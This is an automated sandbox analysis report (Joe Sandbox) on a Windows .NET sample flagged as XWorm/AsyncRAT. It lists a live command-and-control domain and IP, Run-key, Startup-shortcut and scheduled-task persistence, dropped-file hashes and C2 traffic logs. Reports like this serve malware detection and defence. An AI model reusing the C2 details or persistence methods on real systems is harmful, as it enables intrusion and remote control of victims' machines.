http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000010.00000002.1722435612.000002780F6F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000007.00000002.1342572886.000001A1142A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1393262886.000002978DA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1502426529.00000225D995A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1722435612.000002780F6F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000010.00000002.1905721208.000002781F53D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000007.00000002.1360053265.000001A1240F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1442850240.000002979D871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1629972370.00000225E979E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1905721208.000002781F53D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.co | powershell.exe, 00000010.00000002.1935684002.0000027827BA4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000010.00000002.1905721208.000002781F53D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.m:t | powershell.exe, 0000000B.00000002.1458245262.00000297A5FE5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.mic | powershell.exe, 0000000B.00000002.1458245262.00000297A5FE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000010.00000002.1905721208.000002781F53D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV21C: | svchost.exe, 00000018.00000003.2075055763.000002A272920000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.dr, edb.log.24.dr | false | | high
http://crl.ver) | svchost.exe, 00000018.00000002.2528359798.000002A272A84000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.microsoft. | powershell.exe, 00000007.00000002.1366608931.000001A12C706000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1931766181.0000027827A58000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.micft.cMicRosof | powershell.exe, 0000000B.00000002.1458245262.00000297A5FE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000007.00000002.1342572886.000001A114081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1393262886.000002978D801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1502426529.00000225D9731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1722435612.000002780F4D1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1342572886.000001A114081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1393262886.000002978D801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1502426529.00000225D9731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1722435612.000002780F4D1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000010.00000002.1722435612.000002780F6F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
147.185.221.24 | audio-clouds.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true

IP
127.0.0.1
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1575207
                                                      Start date and time:2024-12-14 18:51:06 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 7s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:28
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:aZDwfEKorn.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:803c3419bd5a171884ff51f1d75ce521a505e817fd42f1d52ac0de3c33f6dfca.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@21/25@1/2
                                                      EGA Information:
                                                      • Successful, ratio: 14.3%
                                                      HCA Information:
                                                      • Successful, ratio: 99%
                                                      • Number of executed functions: 71
                                                      • Number of non-executed functions: 11
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.107.246.63, 4.245.163.56
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target boost, PID 1532 because it is empty
                                                      • Execution Graph export aborted for target boost, PID 8088 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 5408 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 7188 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 7440 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 7660 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • VT rate limit hit for: aZDwfEKorn.exe
Time | Type | Description
12:52:05 | API Interceptor | 62x Sleep call for process: powershell.exe modified
14:18:36 | API Interceptor | 101x Sleep call for process: aZDwfEKorn.exe modified
14:18:45 | API Interceptor | 2x Sleep call for process: OpenWith.exe modified
14:18:47 | API Interceptor | 2x Sleep call for process: svchost.exe modified
20:18:37 | Task Scheduler | Run new task: boost path: C:\Users\user\AppData\Roaming\boost
20:18:37 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run boost C:\Users\user\AppData\Roaming\boost
20:18:45 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run boost C:\Users\user\AppData\Roaming\boost
20:18:54 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boost.lnk
Match: 147.185.221.24
Associated Sample Name / URL | Detection | Threat Name | Context
HdTSntLSMB.exe | malicious | XWorm |
file.exe | malicious | XWorm |
file.exe | malicious | XWorm |
NhoqAfkhHL.bat | malicious | Unknown |
a4lIk1Jrla.exe | malicious | Njrat, RevengeRAT |
W6s1vzcRdj.exe | malicious | XWorm |
u7e3vb5dfk.exe | malicious | XWorm |
aOi4JyF92S.exe | malicious | XWorm |
PG4w1WB9dE.exe | malicious | AsyncRAT, XWorm |
a4BE6gJooT.exe | malicious | XWorm |

No context

Match: SALSGIVERUS
Associated Sample Name / URL | Detection | Threat Name | Context
HdTSntLSMB.exe | malicious | XWorm | 147.185.221.24
7laJ4zKd8O.exe | malicious | XWorm | 147.185.221.18
file.exe | malicious | XWorm | 147.185.221.24
testingg.exe | malicious | Njrat | 147.185.221.19
Bloxflip Predictor.exe | malicious | Njrat | 147.185.221.224
system404.exe | malicious | Metasploit | 147.185.221.19
Discord.exe | malicious | AsyncRAT | 147.185.221.18
CVmkXJ7e0a.exe | malicious | SheetRat | 147.185.221.22
file.exe | malicious | XWorm | 147.185.221.24
NhoqAfkhHL.bat | malicious | Unknown | 147.185.221.24

No context

No context
                                                                          Process:C:\Windows\System32\svchost.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1310720
                                                                          Entropy (8bit):0.7067251849850256
                                                                          Encrypted:false
                                                                          SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqu:2JIB/wUKUKQncEmYRTwh0a
                                                                          MD5:8528E20C3EBE731706D5B22BF92CF9BE
                                                                          SHA1:ECF03D2D8CEF7AF835466B224E5338AE6776E1FB
                                                                          SHA-256:0608030078FCE5FF63881501BBBBD3D500986674B41B52A499AC3128E320775C
                                                                          SHA-512:7D6C01F5A0CEAB42B843471DCB78DC76F47312D7305683FB495FE894DA563F9C3C048C70E36255A2687A9CDE6937311B1207646E7A35362FED34A524346A9928
                                                                          Malicious:false
                                                                          Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                          Process:C:\Windows\System32\svchost.exe
                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x41b63728, page size 16384, DirtyShutdown, Windows version 10.0
                                                                          Category:dropped
                                                                          Size (bytes):1310720
                                                                          Entropy (8bit):0.7899982988226537
                                                                          Encrypted:false
                                                                          SSDEEP:1536:jSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:jazaPvgurTd42UgSii
                                                                          MD5:BC16B651AC2A0C4D9A3A2EF756838EF3
                                                                          SHA1:C3533ED983C0FAC4FCCCB047747D93E668A29787
                                                                          SHA-256:57460727560866CD98CDF1A89A77D3F84C887ED7775BF2EB7D4A468D652969B1
                                                                          SHA-512:C8729193DA6B6F64B6E2974B54FB18B460928EC39433D3110D8DDACACF5DDB7B1EFD83231439C69112A3250E84D4048BAC3B29906C5FC75B796FFE4591A12057
                                                                          Malicious:false
                                                                          Preview:A.7(... ...............X\...;...{......................0.`.....42...{5./....|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................\q.^/....|...................=g{/....|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Windows\System32\svchost.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):16384
                                                                          Entropy (8bit):0.08115690217178644
                                                                          Encrypted:false
                                                                          SSDEEP:3:h0tEYe9jeqt/57Dek3J7drSillEqW3l/TjzzQ/t:h7z9jPR3tJ/md8/
                                                                          MD5:5EC972A82B52D79D396D43D46A43428A
                                                                          SHA1:B05C28B6A50A6FB3BBDE0C368F69100D0B38CED6
                                                                          SHA-256:2F44E664DF055FAC075AA97EB87A637C4A3012855863BCF9ABBF8E8B4F281150
                                                                          SHA-512:0839274AE3D09FFBE935E554369F58583C1763EF3700A2E228FAE6D8CB507245D7FB9B91EF5334F5B9A2BF79251C69ADB9767628CC1277B871EE288D2D9F25DC
                                                                          Malicious:false
                                                                          Preview:m.X......................................;...{../....|..42...{5.........42...{5.42...{5...Y.42...{59.................=g{/....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Roaming\boost
                                                                          File Type:CSV text
                                                                          Category:dropped
                                                                          Size (bytes):654
                                                                          Entropy (8bit):5.380476433908377
                                                                          Encrypted:false
                                                                          SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                          MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                          SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                          SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                          SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                          Malicious:false
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):64
                                                                          Entropy (8bit):0.34726597513537405
                                                                          Encrypted:false
                                                                          SSDEEP:3:Nlll:Nll
                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                          Malicious:false
Preview:@...e...........................................................
Process:C:\Users\user\Desktop\aZDwfEKorn.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):41
Entropy (8bit):3.7195394315431693
Encrypted:false
SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
MD5:0DB526D48DAB0E640663E4DC0EFE82BA
SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
Malicious:false
Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\Desktop\aZDwfEKorn.exe
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 14 18:18:36 2024, mtime=Sat Dec 14 18:18:36 2024, atime=Sat Dec 14 18:18:36 2024, length=40960, window=hide
Category:dropped
Size (bytes):732
Entropy (8bit):5.04724089277934
Encrypted:false
SSDEEP:12:805Kw43G0TN+2Chai1Y//EbKGhqjLlvl1jAAyNHVdmeJpaeJpzBmV:80I33w2998b4lvlBAAcdzp3ptm
MD5:55AFB63B92C39955016AE5EBA1D776E9
SHA1:329774E48F88380F1E3E589779F68852CD44F426
SHA-256:3105F8808BE883A916706E6DD259BE10B8BF7B9486433A2E48E2A90467949ED2
SHA-512:025016D7C5642871CFCC5D510A85DDE9FBB1E5CFED26F5CF7A8709ABEFB86F220AA505EB51B39B58424774A1BBEC83B97D7081AFC478C2F6C8CE13A6C0CF95B0
Malicious:false
Preview:L..................F.... ....@1.\N...@1.\N...@1.\N..........................d.:..DG..Yr?.D..U..k0.&...&......Qg.*_.......PN..i.R.\N......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.YE...........................3*N.A.p.p.D.a.t.a...B.V.1......Y|...Roaming.@......EW.=.Y|...........................=N..R.o.a.m.i.n.g.....P.2......YS. .boost.<......YS..YS.....A"....................:z..b.o.o.s.t.......W...............-.......V...........P..t.....C:\Users\user\AppData\Roaming\boost........\.....\.....\.....\.....\.b.o.o.s.t.`.......X.......098239...........hT..CrF.f4... .x..!P....,......hT..CrF.f4... .x..!P....,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
Process:C:\Users\user\Desktop\aZDwfEKorn.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):40960
Entropy (8bit):5.550340510225428
Encrypted:false
SSDEEP:768:TUIDwCrxY4mpc9iauv6hCuuJf27PPfFWPG9/mK6OOwhKjmb2:TdDwCFY4gckpwCuuJfiFv9/X6OOwkS6
MD5:CC052D76FFA12621E3A1FAAC9A71AA2A
SHA1:0700E214D49944A83A141DBB5C982BBF8EFE2D3F
SHA-256:803C3419BD5A171884FF51F1D75CE521A505E817FD42F1D52AC0DE3C33F6DFCA
SHA-512:320741A2B55C6E39D376979299207FBB3FFDC655167A23FFD24E4B073AB76344D660054593B249970653F71294E701F004416C392868F2E1202BB9442FF2D41D
Malicious:true
Yara Hits:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\boost, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\boost, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 82%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}]g................................. ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........[...W............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
Process:C:\Windows\System32\svchost.exe
File Type:JSON data
Category:dropped
Size (bytes):55
Entropy (8bit):4.306461250274409
Encrypted:false
SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:DCA83F08D448911A14C22EBCACC5AD57
SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:false
Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):5.550340510225428
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name:aZDwfEKorn.exe
File size:40'960 bytes
MD5:cc052d76ffa12621e3a1faac9a71aa2a
SHA1:0700e214d49944a83a141dbb5c982bbf8efe2d3f
SHA256:803c3419bd5a171884ff51f1d75ce521a505e817fd42f1d52ac0de3c33f6dfca
SHA512:320741a2b55c6e39d376979299207fbb3ffdc655167a23ffd24e4b073ab76344d660054593b249970653f71294e701f004416c392868f2e1202bb9442ff2d41d
SSDEEP:768:TUIDwCrxY4mpc9iauv6hCuuJf27PPfFWPG9/mK6OOwhKjmb2:TdDwCFY4gckpwCuuJfiFv9/X6OOwkS6
                                                                          TLSH:8F036D843BD48222DAEE7BF91973A50A0B31FA135923DB8E4CD4599F1B37BD089403D6
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}]g................................. ........@.. ....................................@................................
                                                                          Icon Hash:00928e8e8686b000
                                                                          Entrypoint:0x40b3fe
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x675D7D8C [Sat Dec 14 12:43:56 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb3a8 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x4d0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x9404 | 0x9600 | 392db2107c5975c9319123624b9af1ba | False | 0.4861979166666667 | data | 5.670427163184261 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x4d0 | 0x600 | 88bbf8af3de61b972adaf3874313c6bc | False | 0.3736979166666667 | data | 3.6932361765673365 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe000 | 0xc | 0x200 | 251cf3061796844a58b298fe856f5db3 | False | 0.041015625 | data | 0.06116285224115448 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc0a0 | 0x23c | data | | | 0.4755244755244755
RT_MANIFEST | 0xc2e0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-14T18:53:51.009659+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.7 | 49887 | 147.185.221.24 | 28408 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 14, 2024 18:53:13.338315010 CET | 49826 | 28408 | 192.168.2.7 | 147.185.221.24
Dec 14, 2024 18:53:13.458293915 CET | 28408 | 49826 | 147.185.221.24 | 192.168.2.7
Dec 14, 2024 18:53:13.458570004 CET | 49826 | 28408 | 192.168.2.7 | 147.185.221.24
Dec 14, 2024 18:53:13.588061094 CET | 49826 | 28408 | 192.168.2.7 | 147.185.221.24
Dec 14, 2024 18:53:13.708017111 CET | 28408 | 49826 | 147.185.221.24 | 192.168.2.7
Dec 14, 2024 18:53:24.184516907 CET | 49826 | 28408 | 192.168.2.7 | 147.185.221.24
Dec 14, 2024 18:53:24.304271936 CET | 28408 | 49826 | 147.185.221.24 | 192.168.2.7
Dec 14, 2024 18:53:34.776448965 CET | 49826 | 28408 | 192.168.2.7 | 147.185.221.24
Dec 14, 2024 18:53:34.918107986 CET | 28408 | 49826 | 147.185.221.24 | 192.168.2.7
Dec 14, 2024 18:53:35.339212894 CET | 28408 | 49826 | 147.185.221.24 | 192.168.2.7
Dec 14, 2024 18:53:35.339306116 CET | 49826 | 28408 | 192.168.2.7 | 147.185.221.24
Dec 14, 2024 18:53:38.525316000 CET | 49826 | 28408 | 192.168.2.7 | 147.185.221.24
Dec 14, 2024 18:53:38.526904106 CET | 49887 | 28408 | 192.168.2.7 | 147.185.221.24
Dec 14, 2024 18:53:38.657804012 CET | 28408 | 49826 | 147.185.221.24 | 192.168.2.7
Dec 14, 2024 18:53:38.657845020 CET | 28408 | 49887 | 147.185.221.24 | 192.168.2.7
Dec 14, 2024 18:53:38.658010960 CET | 49887 | 28408 | 192.168.2.7 | 147.185.221.24
Dec 14, 2024 18:53:38.692070961 CET | 49887 | 28408 | 192.168.2.7 | 147.185.221.24
Dec 14, 2024 18:53:38.812304974 CET | 28408 | 49887 | 147.185.221.24 | 192.168.2.7
Dec 14, 2024 18:53:51.009659052 CET | 49887 | 28408 | 192.168.2.7 | 147.185.221.24
Dec 14, 2024 18:53:51.279019117 CET | 28408 | 49887 | 147.185.221.24 | 192.168.2.7
Dec 14, 2024 18:54:00.558197021 CET | 28408 | 49887 | 147.185.221.24 | 192.168.2.7
Dec 14, 2024 18:54:00.558271885 CET | 49887 | 28408 | 192.168.2.7 | 147.185.221.24
Dec 14, 2024 18:54:02.087584972 CET | 49887 | 28408 | 192.168.2.7 | 147.185.221.24
Dec 14, 2024 18:54:02.089061022 CET | 49938 | 28408 | 192.168.2.7 | 147.185.221.24
Dec 14, 2024 18:54:02.208699942 CET | 28408 | 49887 | 147.185.221.24 | 192.168.2.7
Dec 14, 2024 18:54:02.210026026 CET | 28408 | 49938 | 147.185.221.24 | 192.168.2.7
Dec 14, 2024 18:54:02.210112095 CET | 49938 | 28408 | 192.168.2.7 | 147.185.221.24
Dec 14, 2024 18:54:02.246972084 CET | 49938 | 28408 | 192.168.2.7 | 147.185.221.24
Dec 14, 2024 18:54:02.374911070 CET | 28408 | 49938 | 147.185.221.24 | 192.168.2.7
Dec 14, 2024 18:54:10.937463999 CET | 49938 | 28408 | 192.168.2.7 | 147.185.221.24
Dec 14, 2024 18:54:11.063613892 CET | 28408 | 49938 | 147.185.221.24 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 14, 2024 18:53:13.065399885 CET | 55106 | 53 | 192.168.2.7 | 1.1.1.1
Dec 14, 2024 18:53:13.330744028 CET | 53 | 55106 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 14, 2024 18:53:13.065399885 CET | 192.168.2.7 | 1.1.1.1 | 0x4f04 | Standard query (0) | audio-clouds.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 14, 2024 18:53:13.330744028 CET | 1.1.1.1 | 192.168.2.7 | 0x4f04 | No error (0) | audio-clouds.gl.at.ply.gg | | 147.185.221.24 | A (IP address) | IN (0x0001) | false

                                                                          Target ID:0
                                                                          Start time:12:52:01
                                                                          Start date:14/12/2024
                                                                          Path:C:\Users\user\Desktop\aZDwfEKorn.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\Desktop\aZDwfEKorn.exe"
